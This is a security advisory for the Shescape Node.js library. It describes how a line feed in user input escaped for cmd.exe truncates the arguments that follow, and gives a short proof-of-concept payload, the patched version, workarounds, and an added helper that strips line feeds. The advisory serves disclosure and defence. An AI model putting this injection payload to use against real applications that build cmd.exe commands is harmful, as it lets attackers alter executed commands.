This impacts users that use Shescape (any API function) to escape arguments for cmd.exe on Windows. An attacker can omit all arguments following their input by including a line feed character ('\n') in the payload. Example:
```javascript
import cp from "node:child_process";
import * as shescape from "shescape";

// 1. Prerequisites
const options = {
  shell: "cmd.exe",
};

// 2. Attack
const payload = "attacker\n";

// 3. Usage
let escapedPayload;

escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options)[0];
// Or
escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options)[0];

cp.execSync(`echo Hello ${escapedPayload}! How are you doing?`, options);
// Outputs: "Hello attacker"
```
Note: execSync is just illustrative here; all of exec, execFile, execFileSync, fork, spawn, and spawnSync can be attacked using a line feed character if CMD is the shell being used.
This bug has been patched in [v1.5.8] which you can upgrade to now. No further changes are required.
Alternatively, line feed characters ('\n') can be stripped out manually or the user input can be made the last argument (this only limits the impact).
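The following is an added example, not code from Shescape or from this advisory: a sketch of the manual workaround, for use before passing input to Shescape when cmd.exe is the shell. The helper names `isPatched` and `guardCmdArgs` are hypothetical, and the version check assumes plain "x.y.z" version strings.

```javascript
// Added example (not Shescape code). Helper names are hypothetical.
const FIRST_PATCHED = [1, 5, 8]; // from the advisory: fixed in v1.5.8

// True when a plain "x.y.z" (optionally "vx.y.z") version is at or above v1.5.8.
// Assumption: pre-release and build suffixes are not supported and throw.
function isPatched(version) {
  const match = /^v?(\d+)\.(\d+)\.(\d+)$/.exec(version);
  if (!match) {
    throw new TypeError(`unsupported version string: ${version}`);
  }
  const parts = match.slice(1).map(Number);
  for (let i = 0; i < 3; i++) {
    if (parts[i] !== FIRST_PATCHED[i]) return parts[i] > FIRST_PATCHED[i];
  }
  return true;
}

// Neutralise line feeds in arguments destined for cmd.exe.
// mode "strip" removes every '\n'; mode "reject" throws so the caller can
// log the attempt and refuse the request. `flagged` lists affected indices.
function guardCmdArgs(args, mode = "strip") {
  const flagged = [];
  const clean = args.map((arg, index) => {
    const text = String(arg);
    if (!text.includes("\n")) return text;
    flagged.push(index);
    if (mode === "reject") {
      throw new RangeError(`argument ${index} contains a line feed`);
    }
    return text.replace(/\n/g, "");
  });
  return { clean, flagged };
}

// Constructed sample input: the payload from the advisory plus a benign value.
const sample = guardCmdArgs(["attacker\n", "Alice"]);
console.log(sample.clean, sample.flagged);
```

Pass each entry of `clean` to Shescape as before; on a version for which `isPatched` returns true the guard is not needed.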
If you have any questions or comments about this advisory:
{ "nvd_published_at": "2022-08-01T20:15:00Z", "severity": "HIGH", "github_reviewed_at": "2022-07-15T21:39:14Z", "github_reviewed": true, "cwe_ids": [ "CWE-74" ] }